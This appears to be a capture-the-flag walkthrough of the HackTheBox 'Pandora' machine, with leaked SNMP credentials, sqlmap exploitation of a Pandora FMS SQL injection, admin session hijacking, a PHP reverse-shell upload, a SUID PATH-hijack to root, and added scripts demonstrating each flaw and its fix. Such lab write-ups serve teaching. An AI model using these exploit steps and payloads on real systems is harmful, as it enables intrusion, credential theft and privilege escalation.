This is my first writeup for a HackTheBox machine; I usually do them on my own without documenting anything, so I will try to be clear about every choice I make.
As usual, let us start with an aggressive nmap scan (-A, which adds version detection, OS detection, default scripts and a traceroute) and see what we get.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-17 21:17 CEST
Nmap scan report for pandora.htb (10.10.11.136)
Host is up (0.036s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 1723/tcp)
HOP RTT ADDRESS
1 36.03 ms 10.10.14.1
2 36.13 ms pandora.htb (10.10.11.136)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.07 seconds
The scan itself is not very useful, but there is a web app on port 80. Browsing it, we see references to a vhost, panda.htb, so let us add that to our /etc/hosts file.
There is not much to do on the root page other than a form that is not worth trying XSS on, so let us throw a quick gobuster scan at it for directories and an ffuf scan for subdomains (virtual hosts, fuzzing the Host header).
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://panda.htb
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/04/17 21:21:25 Starting gobuster in directory enumeration mode
===============================================================
/assets (Status: 301) [Size: 307] [--> http://panda.htb/assets/]
/server-status (Status: 403) [Size: 274]
===============================================================
2022/04/17 21:24:11 Finished
===============================================================
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://panda.htb -H "Host: FUZZ.panda.htb" -fw 13127
v1.5.0 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://panda.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.panda.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response words: 13127
________________________________________________
:: Progress: [4990/4990] :: Job [1/1] :: 784 req/sec :: Duration: [0:00:07] :: Errors: 0 ::
Well, that is disappointing. After that I decided to go back to nmap for a UDP scan (nmap -sU; UDP scans are slow because many ports never answer and hosts rate-limit ICMP port-unreachable replies, hence the growing send delays below):
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-17 21:26 CEST
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 21:26
Scanning panda.htb (10.10.11.136) [4 ports]
Completed Ping Scan at 21:26, 0.09s elapsed (1 total hosts)
Initiating UDP Scan at 21:26
Scanning panda.htb (10.10.11.136) [1000 ports]
Increasing send delay for 10.10.11.136 from 0 to 50 due to max_successful_tryno increase to 5
Increasing send delay for 10.10.11.136 from 50 to 100 due to max_successful_tryno increase to 6
Warning: 10.10.11.136 giving up on port because retransmission cap hit (6).
Increasing send delay for 10.10.11.136 from 100 to 200 due to 11 out of 11 dropped probes since last increase.
UDP Scan Timing: About 8.34% done; ETC: 21:32 (0:05:41 remaining)
Increasing send delay for 10.10.11.136 from 200 to 400 due to 11 out of 11 dropped probes since last increase.
Increasing send delay for 10.10.11.136 from 400 to 800 due to 11 out of 11 dropped probes since last increase.
UDP Scan Timing: About 11.94% done; ETC: 21:34 (0:07:30 remaining)
UDP Scan Timing: About 14.74% done; ETC: 21:36 (0:08:46 remaining)
UDP Scan Timing: About 17.66% done; ETC: 21:37 (0:09:24 remaining)
Verbosity Increased to 2.
Stats: 0:04:52 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 33.84% done; ETC: 21:40 (0:09:31 remaining)
UDP Scan Timing: About 41.03% done; ETC: 21:41 (0:08:47 remaining)
UDP Scan Timing: About 47.49% done; ETC: 21:41 (0:08:02 remaining)
UDP Scan Timing: About 53.50% done; ETC: 21:41 (0:07:14 remaining)
UDP Scan Timing: About 59.21% done; ETC: 21:42 (0:06:25 remaining)
UDP Scan Timing: About 64.61% done; ETC: 21:42 (0:05:37 remaining)
UDP Scan Timing: About 70.01% done; ETC: 21:42 (0:04:48 remaining)
UDP Scan Timing: About 75.21% done; ETC: 21:42 (0:04:00 remaining)
Discovered open port 161/udp on 10.10.11.136
Perfect, finally we have something: SNMP on 161/udp. Let us enumerate it with snmpwalk and see what we get. (The exact command is not shown here; the usual first attempt is snmpwalk -v2c -c public panda.htb, which only works if the agent accepts a read-only community string, public being the default one.) The part of the walk that matters is below: hrSWRunParameters from HOST-RESOURCES-MIB (OID .1.3.6.1.2.1.25.4.2.1.5, indexed by PID), i.e. the command-line arguments of every running process on the host.
iso.3.6.1.2.1.25.4.2.1.5.833 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.836 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.847 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
iso.3.6.1.2.1.25.4.2.1.5.858 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.861 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.863 = ""
iso.3.6.1.2.1.25.4.2.1.5.865 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.914 = STRING: "-o -p -- \\u --noclear tty1 linux"
iso.3.6.1.2.1.25.4.2.1.5.936 = STRING: "--no-debug"
iso.3.6.1.2.1.25.4.2.1.5.976 = ""
iso.3.6.1.2.1.25.4.2.1.5.1133 = STRING: "-u daniel -p HotelBabylon23"
iso.3.6.1.2.1.25.4.2.1.5.1161 = ""
iso.3.6.1.2.1.25.4.2.1.5.1183 = STRING: "--user"
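The snmpwalk output above is worth automating over, because the same leak shows up on any host whose SNMP agent exposes HOST-RESOURCES-MIB. The following script is an added example (my own code, not part of the original writeup or of any tool): it parses hrSWRunParameters lines in the shape snmpwalk prints them and flags processes whose arguments carry a password. The sample input is six of the lines above; the flag lists are a heuristic I chose, and the check that skips values starting with / or - is there because snmpd's own "-p /run/snmpd.pid" is a pid file, not a password.

```python
import re
from typing import Dict, List, Optional

# Lines taken from the snmpwalk above (hrSWRunParameters, OID
# .1.3.6.1.2.1.25.4.2.1.5.<pid>): the argument string of each process.
WALK_SAMPLE = """\
iso.3.6.1.2.1.25.4.2.1.5.836 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.847 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
iso.3.6.1.2.1.25.4.2.1.5.861 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.863 = ""
iso.3.6.1.2.1.25.4.2.1.5.1133 = STRING: "-u daniel -p HotelBabylon23"
iso.3.6.1.2.1.25.4.2.1.5.1183 = STRING: "--user"
"""

# One hrSWRunParameters row: OID prefix (iso. or .1. style), PID, then either
# STRING: "<args>" or a bare "" for processes without arguments.
LINE_RE = re.compile(
    r'^(?:iso|\.1)\.3\.6\.1\.2\.1\.25\.4\.2\.1\.5\.(\d+) = (?:STRING: "(.*)"|"")\s*$'
)
# Flags whose following value is usually a password / user name (heuristic).
PASSWORD_RE = re.compile(r'(?:^|\s)(?:-p|-P|--password|--passwd|--pass)\s+(\S+)')
USER_RE = re.compile(r'(?:^|\s)(?:-u|-U|--user|--username)\s+(\S+)')


def parse_hr_sw_run_params(walk: str) -> Dict[int, str]:
    """Map PID -> argument string for every hrSWRunParameters line."""
    procs: Dict[int, str] = {}
    for line in walk.splitlines():
        m = LINE_RE.match(line)
        if m:
            procs[int(m.group(1))] = m.group(2) or ""
    return procs


def looks_like_secret(value: str) -> bool:
    # "-p" is overloaded: snmpd's "-p /run/snmpd.pid" is a pid file, not a
    # password, and a value starting with "-" is just the next flag.
    return bool(value) and not value.startswith(("/", "-"))


def find_credentials(procs: Dict[int, str]) -> List[Dict[str, Optional[object]]]:
    """Return the processes whose arguments appear to carry a password."""
    hits = []
    for pid, args in procs.items():
        m = PASSWORD_RE.search(args)
        if not m:
            continue
        # Strip quoting left over from nested "bash -c '...'" wrappers.
        password = m.group(1).strip("'\";")
        if not looks_like_secret(password):
            continue
        u = USER_RE.search(args)
        hits.append({
            "pid": pid,
            "user": u.group(1).strip("'\";") if u else None,
            "password": password,
            "args": args,
        })
    return hits


if __name__ == "__main__":
    for hit in find_credentials(parse_hr_sw_run_params(WALK_SAMPLE)):
        print(f"pid {hit['pid']}: user={hit['user']} password={hit['password']}")
```

On the walk above this reports PIDs 847 and 1133 (both daniel / HotelBabylon23) and stays quiet on snmpd's own process. The defensive lesson is the same as for /proc: never pass secrets as command-line arguments, and do not expose a read-only community string to the network if you can avoid it.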
So we have credentials: a script is run with -u daniel -p HotelBabylon23 on its command line, and process arguments are readable by anyone who can query SNMP (just as they would be in /proc or ps for any local user). Now we can SSH in as daniel.
After a bit of enumeration we can see there is another web application on the server:
daniel@pandora:~$ ls /var/www
html pandora
daniel@pandora:~$ ls /var/www/pandora/
index.html pandora_console
daniel@pandora:~$ ls /var/www/pandora/pandora_console/
ajax.php composer.lock Dockerfile godmode mobile pandora_console_logrotate_ubuntu tests
attachment COPYING extensions images operation pandora_console_upgrade tools
audit.log DB_Dockerfile extras include pandora_console.log pandoradb_data.sql vendor
AUTHORS DEBIAN fonts index.php pandora_console_logrotate_centos pandoradb.sql ws.php
composer.json docker_entrypoint.sh general install.done pandora_console_logrotate_suse pandora_websocket_engine.service
daniel@pandora:~$
But it is not exposed to the public; it is only reachable from the box itself, so we will have to forward it to our machine. There are many ways to do this, but I will use an SSH local port forward: -L 9999:127.0.0.1:80 makes port 9999 on my machine tunnel to port 80 on the box's loopback interface.
ssh daniel@panda.htb -L 9999:127.0.0.1:80
daniel@panda.htb's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun 17 Apr 20:10:47 UTC 2022
System load: 0.0
Usage of /: 63.4% of 4.87GB
Memory usage: 10%
Swap usage: 0%
Processes: 230
Users logged in: 1
IPv4 address for eth0: 10.10.11.136
IPv6 address for eth0: dead:beef::250:56ff:feb9:33a4
=> /boot is using 91.8% of 219MB
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun Apr 17 20:10:30 2022 from 10.10.15.195
daniel@pandora:~$
Browsing to http://localhost:9999/pandora_console/ we are greeted with a web application named "Pandora FMS" and a login form. Looking it up, there are multiple published vulnerabilities for it; one of them is an unauthenticated SQL injection in /include/chart_generator.php via the session_id parameter (CVE-2021-32099), so let us try that.
The vulnerable URI is "http://localhost:9999/pandora_console/include/chart_generator.php?session_id=test". Knowing that, let us intercept the request with Burp, save it to a "request.txt" file and feed it to sqlmap with -r request.txt, first with --dbs to list the databases:
[23:13:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 19.10 or 20.04 (focal or eoan)
web application technology: PHP, Apache 2.4.41
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:13:00] [INFO] fetching database names
[23:13:00] [INFO] retrieved: 'information_schema'
[23:13:00] [INFO] retrieved: 'pandora'
available databases [2]:
[*] information_schema
[*] pandora
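To make the bug class concrete, here is an added example (not Pandora FMS code, and not from the original post) in Python on an in-memory SQLite table shaped like tsessions_php below, with three rows copied from the dump. A session lookup that splices session_id into the SQL string returns the admin's session for a payload that never matched any id, while the parameterised lookup returns nothing for the same input. The payloads and the table layout are my assumptions for the demo; the real query in chart_generator.php is not reproduced here.

```python
import re
import sqlite3
from typing import List, Optional, Tuple

# Three rows in the shape of the tsessions_php dump (PHP-serialised session
# data); constructed here so the example runs without the box.
SESSION_ROWS = [
    ("09vao3q1dikuoi1vhcvhcjjbc6", 'id_usuario|s:6:"daniel";', 1638783555),
    ("0ahul7feb1l9db7ffp8d25sjba", None, 1638789018),
    ("p5s49h43f3gep5n5iat3skr6f4",
     'id_usuario|s:5:"admin";alert_msg|a:0:{}new_chat|b:0;'
     'csrf_code|s:32:"96bc1528afb4e66a70ed22648bb8bd97";', 1650231045),
]

# Payloads for the session_id parameter: close the string, widen the WHERE
# clause, and comment out the trailing quote the query would add.
ADMIN_PAYLOAD = """x' OR data LIKE '%"admin"%' -- """
ALL_ROWS_PAYLOAD = "x' OR 1=1 -- "


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE tsessions_php "
        "(id_session TEXT PRIMARY KEY, data TEXT, last_active INTEGER)"
    )
    conn.executemany("INSERT INTO tsessions_php VALUES (?, ?, ?)", SESSION_ROWS)
    return conn


def lookup_session_vulnerable(conn: sqlite3.Connection,
                              session_id: str) -> List[Tuple[str, Optional[str]]]:
    # The bug class: the caller-supplied id is spliced into the SQL text, so a
    # quote inside it changes the query instead of being compared as data.
    sql = "SELECT id_session, data FROM tsessions_php WHERE id_session = '%s'" % session_id
    return conn.execute(sql).fetchall()


def lookup_session_safe(conn: sqlite3.Connection,
                        session_id: str) -> List[Tuple[str, Optional[str]]]:
    # Hardened form: a bound parameter is always compared as a value.
    sql = "SELECT id_session, data FROM tsessions_php WHERE id_session = ?"
    return conn.execute(sql, (session_id,)).fetchall()


def user_from_session_data(data: Optional[str]) -> Optional[str]:
    """Pull id_usuario out of PHP's serialised session format."""
    m = re.search(r'id_usuario\|s:\d+:"([^"]*)";', data or "")
    return m.group(1) if m else None


if __name__ == "__main__":
    db = build_db()
    for sid, data in lookup_session_vulnerable(db, ADMIN_PAYLOAD):
        print("hijackable session:", sid, "->", user_from_session_data(data))
    print("same payload, parameterised:", lookup_session_safe(db, ADMIN_PAYLOAD))
```

The payload with OR 1=1 returns every row, which is what sqlmap's dump below exploits at scale; the targeted LIKE payload is how you would go straight for the admin session by hand.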
Let us list the tables in the pandora database (-D pandora --tables):
Database: pandora
[178 tables]
+------------------------------------+
| taddress |
| taddress_agent |
| tagent_access |
| tagent_custom_data |
| tagent_custom_fields |
| tagent_custom_fields_filter |
| tagent_module_inventory |
| tagent_module_log |
| tagent_repository |
| tagent_secondary_group |
| tagente |
| tagente_datos |
| tagente_datos_inc |
| tagente_datos_inventory |
| tagente_datos_log4x |
| tagente_datos_string |
| tagente_estado |
| tagente_modulo |
| talert_actions |
| talert_commands |
| talert_snmp |
| talert_snmp_action |
| talert_special_days |
| talert_template_module_actions |
| talert_template_modules |
| talert_templates |
| tattachment |
| tautoconfig |
| tautoconfig_actions |
| tautoconfig_rules |
| tcategory |
| tcluster |
| tcluster_agent |
| tcluster_item |
| tcollection |
| tconfig |
| tconfig_os |
| tcontainer |
| tcontainer_item |
| tcredential_store |
| tdashboard |
| tdatabase |
| tdeployment_hosts |
| tevent_alert |
| tevent_alert_action |
| tevent_custom_field |
| tevent_extended |
| tevent_filter |
| tevent_response |
| tevent_rule |
| tevento |
| textension_translate_string |
| tfiles_repo |
| tfiles_repo_group |
| tgis_data_history |
| tgis_data_status |
| tgis_map |
| tgis_map_connection |
| tgis_map_has_tgis_map_con |
| tgis_map_layer |
| tgis_map_layer_groups |
| tgis_map_layer_has_tagente |
| tgraph |
| tgraph_source |
| tgraph_source_template |
| tgraph_template |
| tgroup_stat |
| tgrupo |
| tincidencia |
| titem |
| tlanguage |
| tlayout |
| tlayout_data |
| tlayout_template |
| tlayout_template_data |
| tlink |
| tlocal_component |
| tlog_graph_models |
| tmap |
| tmensajes |
| tmetaconsole_agent |
| tmetaconsole_agent_secondary_group |
| tmetaconsole_event |
| tmetaconsole_event_history |
| tmetaconsole_setup |
| tmigration_module_queue |
| tmigration_queue |
| tmodule |
| tmodule_group |
| tmodule_inventory |
| tmodule_relationship |
| tmodule_synth |
| tnetflow_filter |
| tnetflow_report |
| tnetflow_report_content |
| tnetwork_component |
| tnetwork_component_group |
| tnetwork_map |
| tnetwork_matrix |
| tnetwork_profile |
| tnetwork_profile_component |
| tnetworkmap_ent_rel_nodes |
| tnetworkmap_enterprise |
| tnetworkmap_enterprise_nodes |
| tnews |
| tnota |
| tnotification_group |
| tnotification_source |
| tnotification_source_group |
| tnotification_source_group_user |
| tnotification_source_user |
| tnotification_user |
| torigen |
| tpassword_history |
| tperfil |
| tphase |
| tplanned_downtime |
| tplanned_downtime_agents |
| tplanned_downtime_modules |
| tplugin |
| tpolicies |
| tpolicy_agents |
| tpolicy_alerts |
| tpolicy_alerts_actions |
| tpolicy_collections |
| tpolicy_groups |
| tpolicy_modules |
| tpolicy_modules_inventory |
| tpolicy_plugins |
| tpolicy_queue |
| tprofile_view |
| tprovisioning |
| tprovisioning_rules |
| trecon_script |
| trecon_task |
| trel_item |
| tremote_command |
| tremote_command_target |
| treport |
| treport_content |
| treport_content_item |
| treport_content_item_temp |
| treport_content_sla_com_temp |
| treport_content_sla_combined |
| treport_content_template |
| treport_custom_sql |
| treport_template |
| treset_pass |
| treset_pass_history |
| tserver |
| tserver_export |
| tserver_export_data |
| tservice |
| tservice_element |
| tsesion |
| tsesion_extended |
| tsessions_php |
| tskin |
| tsnmp_filter |
| ttag |
| ttag_module |
| ttag_policy_module |
| ttipo_modulo |
| ttransaction |
| ttrap |
| ttrap_custom_values |
| tupdate |
| tupdate_journal |
| tupdate_package |
| tupdate_settings |
| tuser_double_auth |
| tuser_task |
| tuser_task_scheduled |
| tusuario |
| tusuario_perfil |
| tvisual_console_elements_cache |
| twidget |
| twidget_dashboard |
+------------------------------------+
Well, that is quite the database. Since the injection point is a session id, the table named "tsessions_php" is the obvious target, so let us dump it (-D pandora -T tsessions_php --dump):
Database: pandora
Table: tsessions_php
[48 entries]
+----------------------------+--------------------------------------------------------------------------------------------------------+-------------+
| id_session | data | last_active |
+----------------------------+--------------------------------------------------------------------------------------------------------+-------------+
| 09vao3q1dikuoi1vhcvhcjjbc6 | id_usuario|s:6:"daniel"; | 1638783555 |
| 0ahul7feb1l9db7ffp8d25sjba | NULL | 1638789018 |
| 1um23if7s531kqf5da14kf5lvm | NULL | 1638792211 |
| 2e25c62vc3odbppmg6pjbf9bum | NULL | 1638786129 |
| 2fb6a6ofi5c5gr9rih6q6eajet | NULL | 1650231355 |
| 2g39hkugj5sdg2qalgpgvml63o | NULL | 1650230954 |
| 346uqacafar8pipuppubqet7ut | id_usuario|s:6:"daniel"; | 1638540332 |
| 3me2jjab4atfa5f8106iklh4fc | NULL | 1638795380 |
| 4f51mju7kcuonuqor3876n8o02 | NULL | 1638786842 |
| 4nsbidcmgfoh1gilpv8p5hpi2s | id_usuario|s:6:"daniel"; | 1638535373 |
| 541b95na0fcmcsp6opljhojpfs | NULL | 1650231187 |
| 59qae699l0971h13qmbpqahlls | NULL | 1638787305 |
| 5fihkihbip2jioll1a8mcsmp6j | NULL | 1638792685 |
| 5i352tsdh7vlohth30ve4o0air | id_usuario|s:6:"daniel"; | 1638281946 |
| 66dtfimfsu71u6bfjbv7j5h9rd | id_usuario|s:6:"daniel"; | 1650230562 |
| 69gbnjrc2q42e8aqahb1l2s68n | id_usuario|s:6:"daniel"; | 1641195617 |
| 6fs5onipp61e4vkt5hjnhd3lc8 | id_usuario|s:6:"daniel"; | 1650231114 |
| 81f3uet7p3esgiq02d4cjj48rc | NULL | 1623957150 |
| 8m2e6h8gmphj79r9pq497vpdre | id_usuario|s:6:"daniel"; | 1638446321 |
| 8upeameujo9nhki3ps0fu32cgd | NULL | 1638787267 |
| 9vv4godmdam3vsq8pu78b52em9 | id_usuario|s:6:"daniel"; | 1638881787 |
| a3a49kc938u7od6e6mlip1ej80 | NULL | 1638795315 |
| agfdiriggbt86ep71uvm1jbo3f | id_usuario|s:6:"daniel"; | 1638881664 |
| cojb6rgubs18ipb35b3f6hf0vp | NULL | 1638787213 |
| d0carbrks2lvmb90ergj7jv6po | NULL | 1638786277 |
| f0qisbrojp785v1dmm8cu1vkaj | id_usuario|s:6:"daniel"; | 1641200284 |
| f2sban0efcc1ecfin3dhoi88sl | NULL | 1650231232 |
| fikt9p6i78no7aofn74rr71m85 | NULL | 1638786504 |
| fqd96rcv4ecuqs409n5qsleufi | NULL | 1638786762 |
| g0kteepqaj1oep6u7msp0u38kv | id_usuario|s:6:"daniel"; | 1638783230 |
| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; | 1638796349 |
| gf40pukfdinc63nm5lkroidde6 | NULL | 1638786349 |
| heasjj8c48ikjlvsf1uhonfesv | NULL | 1638540345 |
| hsftvg6j5m3vcmut6ln6ig8b0f | id_usuario|s:6:"daniel"; | 1638168492 |
| jecd4v8f6mlcgn4634ndfl74rd | id_usuario|s:6:"daniel"; | 1638456173 |
| jvk5c5s8rqq01grfeo77mer347 | id_usuario|s:6:"daniel"; | 1650231010 |
| kp90bu1mlclbaenaljem590ik3 | NULL | 1638787808 |
| ne9rt4pkqqd0aqcrr4dacbmaq3 | NULL | 1638796348 |
| o3kuq4m5t5mqv01iur63e1di58 | id_usuario|s:6:"daniel"; | 1638540482 |
| oi2r6rjq9v99qt8q9heu3nulon | id_usuario|s:6:"daniel"; | 1637667827 |
| p5s49h43f3gep5n5iat3skr6f4 | id_usuario|s:5:"admin";alert_msg|a:0:{}new_chat|b:0;csrf_code|s:32:"96bc1528afb4e66a70ed22648bb8bd97"; | 1650231045 |
| pjp312be5p56vke9dnbqmnqeot | id_usuario|s:6:"daniel"; | 1638168416 |
| qq8gqbdkn8fks0dv1l9qk6j3q8 | NULL | 1638787723 |
| r097jr6k9s7k166vkvaj17na1u | NULL | 1638787677 |
| rgku3s5dj4mbr85tiefv53tdoa | id_usuario|s:6:"daniel"; | 1638889082 |
| u5ktk2bt6ghb7s51lka5qou4r4 | id_usuario|s:6:"daniel"; | 1638547193 |
| u74bvn6gop4rl21ds325q80j0e | id_usuario|s:6:"daniel"; | 1638793297 |
| u7d6e9rvfheg1lee434g3c4g21 | NULL | 1650230876 |
+----------------------------+--------------------------------------------------------------------------------------------------------+-------------+
Now we have an admin session id (p5s49h43f3gep5n5iat3skr6f4; its last_active timestamp is from today, so it should still be valid), so let us use it on the web app: replace the value of the PHP session cookie (PHPSESSID) in the browser with that id and reload.
Perfect, we are logged in as admin. Looking for a way to get a reverse shell, I found a File Manager in the Admin Tools section that lets us upload files into the console's web root, which is all we need.
As always, my go-to reverse shell for PHP is the classic php-reverse-shell, pointed at my listener (nc -lvp 1337).
Finally we request it at "http://localhost:9999/pandora_console/images/reverse.php" and the listener gets a shell as a more privileged user, matt:
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
21:44:03 up 22 min, 3 users, load average: 0.03, 0.04, 0.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
daniel pts/0 10.10.16.81 21:23 3:42 0.04s 0.04s -bash
daniel pts/1 10.10.15.195 21:23 20:07 0.03s 0.03s -bash
matt pts/2 10.10.16.81 21:40 43.00s 0.05s 0.05s -bash
uid=1000(matt) gid=1000(matt) groups=1000(matt)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(matt) gid=1000(matt) groups=1000(matt)
$ python3 -c "import pty;pty.spawn('/bin/bash')"
matt@pandora:/$ export TERM=xterm; export SHELL=/bin/bash
export TERM=xterm; export SHELL=/bin/bash
matt@pandora:/$ ^Z
zsh: suspended nc -lvp 1337
┌──(max㉿1337)-[~/pandora]
└─$ stty raw -echo;fg
[1] + continued nc -lvp 1337
matt@pandora:/$ stty rows 50 columns 200
matt@pandora:/$ ls
bin boot cdrom dev etc home lib lib32 lib64 libx32 lost+found media mnt proc root run sbin srv sys tmp usr var
matt@pandora:/$
Grab the user flag from matt's home directory and let us move on to root escalation.
Enumerating SUID binaries, we can see a suspicious one:
matt@pandora:/home/matt$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/at
/usr/bin/fusermount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
matt@pandora:/home/matt$
pandora_backup is not a standard SUID binary, so maybe we can do something with it. Let us run it and see:
matt@pandora:/home/matt$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
Backup failed!
Check your permissions!
matt@pandora:/home/matt$
The error messages come from tar, so the binary shells out to tar to build the backup. It invokes tar by bare name rather than by absolute path (/usr/bin/tar), which means the shell resolves it through PATH; and since the binary runs as root thanks to the SUID bit, we can put our own "tar" first in PATH and have it spawn a shell. Two things to check before relying on this: the binary must actually keep root when it runs tar (below it ends up with uid=0, not just an effective uid of 0; if only the effective uid were root, bash would drop it unless started with -p), and the directory we prepend to PATH must be writable by us. Let us try it and see.
matt@pandora:/$ cd tmp
matt@pandora:/tmp$ ls
systemd-private-96b823f80e9d4a64975446ca9f676852-apache2.service-43l5Ai
systemd-private-96b823f80e9d4a64975446ca9f676852-systemd-logind.service-WUJXYf
systemd-private-96b823f80e9d4a64975446ca9f676852-systemd-resolved.service-a18hBi
systemd-private-96b823f80e9d4a64975446ca9f676852-systemd-timesyncd.service-AglMTe
vmware-root_713-4290166671
matt@pandora:/tmp$ mkdir root
matt@pandora:/tmp$ cd root
matt@pandora:/tmp/root$ ls
matt@pandora:/tmp/root$ echo "/bin/bash">tar
matt@pandora:/tmp/root$ chmod +x tar
matt@pandora:/tmp/root$ export PATH=/tmp/root:$PATH
matt@pandora:/tmp/root$ pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:/tmp/root# id
uid=0(root) gid=1000(matt) groups=1000(matt)
root@pandora:/tmp/root#
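The same mechanism reproduced offline, as an added example (mine, not the machine's binary): a model of a privileged program that runs tar by bare name, once with a PATH we control in front and once with a fixed trusted PATH. The fake tar here just prints a marker instead of spawning bash, and /usr/bin:/bin as the trusted PATH is my assumption.

```python
import os
import shutil
import subprocess
import tempfile
from typing import Tuple

# Constructed stand-in for the attacker's tar: a script that just announces
# it ran. On the box this is where "/bin/bash" went.
FAKE_TAR = "#!/bin/sh\necho HIJACKED\n"


def plant_fake_tar(directory: str) -> str:
    """Drop an executable named 'tar' into a directory we control."""
    path = os.path.join(directory, "tar")
    with open(path, "w") as fh:
        fh.write(FAKE_TAR)
    os.chmod(path, 0o755)
    return path


def run_backup_step(path_env: str) -> str:
    """Model of pandora_backup's tar call: system("tar ...") with a bare name.

    The shell resolves 'tar' through PATH, so whoever controls PATH decides
    which program runs. Returns the combined output of whatever ran.
    """
    proc = subprocess.run(
        "tar --version", shell=True, env={"PATH": path_env},
        capture_output=True, text=True,
    )
    return (proc.stdout + proc.stderr).strip()


def trusted_path() -> str:
    # What a privileged program should do instead: ignore the caller's PATH
    # (or call /usr/bin/tar by absolute path). Assumed value for the demo.
    return "/usr/bin:/bin"


def demo() -> Tuple[str, str]:
    """Run the tar step once with a hijacked PATH and once with a fixed one."""
    workdir = tempfile.mkdtemp(prefix="pathhijack-")
    try:
        plant_fake_tar(workdir)
        attacker_path = workdir + os.pathsep + trusted_path()
        return run_backup_step(attacker_path), run_backup_step(trusted_path())
    finally:
        shutil.rmtree(workdir, ignore_errors=True)


if __name__ == "__main__":
    hijacked, fixed = demo()
    print("attacker PATH :", hijacked)
    print("trusted PATH  :", fixed.splitlines()[0] if fixed else "(no output)")
```

With the attacker's directory first in PATH the marker script runs; with the trusted PATH either the real tar answers or the shell reports tar as missing, but the planted file is never used. That is the whole fix for this class of bug: a setuid program must not trust inherited PATH (or any other environment it did not set itself).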
Note: you are going to need an SSH session as matt for the pandora_backup escalation; from the reverse shell it did not work for me. Generate a key pair, append your public key to /home/matt/.ssh/authorized_keys and SSH in as matt before running the steps above. (SUID elevation commonly fails from a shell spawned by a hardened service, for example one started with systemd's NoNewPrivileges=, which every child process inherits.)
Perfect, now just grab the flag from /root/root.txt. Hope you enjoyed it!